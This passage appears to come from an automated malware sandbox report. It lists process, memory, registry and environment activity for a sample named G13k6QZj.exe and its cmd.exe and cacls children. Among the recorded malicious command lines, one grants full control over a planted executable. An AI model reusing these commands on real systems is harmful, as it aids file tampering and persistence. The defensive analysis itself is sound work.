| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f4e0000 | 0x7f4e0000 | 0x7f5dffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f5e0000 | 0x7f5e0000 | 0x7f602fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f606000 | 0x7f606000 | 0x7f606fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f609000 | 0x7f609000 | 0x7f60bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f60c000 | 0x7f60c000 | 0x7f60efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f60f000 | 0x7f60f000 | 0x7f60ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #194: cmd.exe
54
0
| Information | Value |
|---|---|
| ID | #194 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c G13k6QZj.exe -accepteula "Shorthand.jtp" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:15, Reason: Child Process |
| Unmonitor | End Time: 00:03:19, Reason: Self Terminated |
| Monitor Duration | 00:00:04 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x854 |
| Parent PID | 0x57c (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
A98
0x
DBC
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000670000 | 0x00670000 | 0x0068ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000670000 | 0x00670000 | 0x0067ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000680000 | 0x00680000 | 0x00683fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000690000 | 0x00690000 | 0x00691fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000690000 | 0x00690000 | 0x00693fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000006a0000 | 0x006a0000 | 0x006b3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000006c0000 | 0x006c0000 | 0x006fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000700000 | 0x00700000 | 0x007fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000800000 | 0x00800000 | 0x00803fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000810000 | 0x00810000 | 0x00810fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000820000 | 0x00820000 | 0x00821fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000830000 | 0x00830000 | 0x0086ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000870000 | 0x00870000 | 0x0087ffff | Private Memory | rw |
|
|
|
- |
| cmd.exe | 0x00930000 | 0x0097ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000980000 | 0x00980000 | 0x0497ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004980000 | 0x04980000 | 0x04c2ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04980000 | 0x04a3dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004b30000 | 0x04b30000 | 0x04c2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004c30000 | 0x04c30000 | 0x04d2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004d30000 | 0x04d30000 | 0x04edffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x04ee0000 | 0x05216fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007ef20000 | 0x7ef20000 | 0x7f01ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f020000 | 0x7f020000 | 0x7f042fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f044000 | 0x7f044000 | 0x7f046fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f047000 | 0x7f047000 | 0x7f047fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f04a000 | 0x7f04a000 | 0x7f04cfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f04d000 | 0x7f04d000 | 0x7f04dfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
2 | |
| Get Info | G13k6QZj.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
4 | |
| Open | STD_INPUT_HANDLE | - |
|
2 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 63, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\G13k6QZj.exe | os_pid = 0xcec, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x930000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x752a2780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x7527fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7527a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74f835c0 |
|
1 |
Environment (17)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
6 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #195: cmd.exe
54
0
| Information | Value |
|---|---|
| ID | #195 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c G13k6QZj.exe -accepteula "PhotoViewer.dll.mui" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:15, Reason: Child Process |
| Unmonitor | End Time: 00:03:19, Reason: Self Terminated |
| Monitor Duration | 00:00:04 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xa1c |
| Parent PID | 0x6d4 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
7DC
0x
FBC
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x00000000003f0000 | 0x003f0000 | 0x0040ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000003f0000 | 0x003f0000 | 0x003fffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000400000 | 0x00400000 | 0x00403fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000410000 | 0x00410000 | 0x00411fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000410000 | 0x00410000 | 0x00413fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000420000 | 0x00420000 | 0x00433fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000440000 | 0x00440000 | 0x0047ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0057ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000580000 | 0x00580000 | 0x00583fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000590000 | 0x00590000 | 0x00590fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000005a0000 | 0x005a0000 | 0x005a1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x005b0000 | 0x0066dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000670000 | 0x00670000 | 0x006affff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000770000 | 0x00770000 | 0x0077ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000780000 | 0x00780000 | 0x0087ffff | Private Memory | rw |
|
|
|
- |
| cmd.exe | 0x00930000 | 0x0097ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000980000 | 0x00980000 | 0x0497ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004980000 | 0x04980000 | 0x04bfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004980000 | 0x04980000 | 0x04a8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004b00000 | 0x04b00000 | 0x04bfffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x04c00000 | 0x04f36fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f680000 | 0x7f680000 | 0x7f77ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f780000 | 0x7f780000 | 0x7f7a2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f7a8000 | 0x7f7a8000 | 0x7f7aafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f7ab000 | 0x7f7ab000 | 0x7f7adfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f7ae000 | 0x7f7ae000 | 0x7f7aefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f7af000 | 0x7f7af000 | 0x7f7affff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
2 | |
| Get Info | G13k6QZj.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
4 | |
| Open | STD_INPUT_HANDLE | - |
|
2 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 40, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\G13k6QZj.exe | os_pid = 0x6e0, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x930000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x752a2780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x7527fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7527a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74f835c0 |
|
1 |
Environment (17)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
6 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #196: cacls.exe
0
0
| Information | Value |
|---|---|
| ID | #196 |
| File Name | c:\windows\syswow64\cacls.exe |
| Command Line | cacls "C:\Program Files\Windows Portable Devices\publisherfunnydownloaded.exe" /E /G CIiHmnxMn6Ps:F /C |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:16, Reason: Child Process |
| Unmonitor | End Time: 00:03:21, Reason: Self Terminated |
| Monitor Duration | 00:00:05 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x35c |
| Parent PID | 0x380 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
CC0
0x
7F8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000050000 | 0x00050000 | 0x0006ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x0005ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x00063fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000070000 | 0x00070000 | 0x00071fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000070000 | 0x00070000 | 0x00073fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000080000 | 0x00080000 | 0x00093fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x000dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000e0000 | 0x000e0000 | 0x0011ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000120000 | 0x00120000 | 0x00123fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000130000 | 0x00130000 | 0x00130fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000140000 | 0x00140000 | 0x00141fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000150000 | 0x00150000 | 0x0018ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000190000 | 0x00190000 | 0x001cffff | Private Memory | rw |
|
|
|
- |
| cacls.exe.mui | 0x001d0000 | 0x001d1fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000001e0000 | 0x001e0000 | 0x001effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001f0000 | 0x001f0000 | 0x0044ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x001f0000 | 0x002adfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000350000 | 0x00350000 | 0x0044ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000450000 | 0x00450000 | 0x005dffff | Private Memory | rw |
|
|
|
- |
| cacls.exe | 0x00830000 | 0x00839fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000840000 | 0x00840000 | 0x0483ffff | Pagefile Backed Memory | - |
|
|
|
- |
| sortdefault.nls | 0x04840000 | 0x04b76fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x748a0000 | 0x748c7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f050000 | 0x7f050000 | 0x7f14ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f150000 | 0x7f150000 | 0x7f172fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f178000 | 0x7f178000 | 0x7f17afff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f17b000 | 0x7f17b000 | 0x7f17bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f17c000 | 0x7f17c000 | 0x7f17efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f17f000 | 0x7f17f000 | 0x7f17ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #197: g13k6qzj.exe
175
0
| Information | Value |
|---|---|
| ID | #197 |
| File Name | c:\users\ciihmnxmn6ps\desktop\g13k6qzj.exe |
| Command Line | G13k6QZj.exe -accepteula -c Run -y -p extract -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:16, Reason: Child Process |
| Unmonitor | End Time: 00:03:17, Reason: Self Terminated |
| Monitor Duration | 00:00:01 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xa90 |
| Parent PID | 0x76c (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
824
0x
FD8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
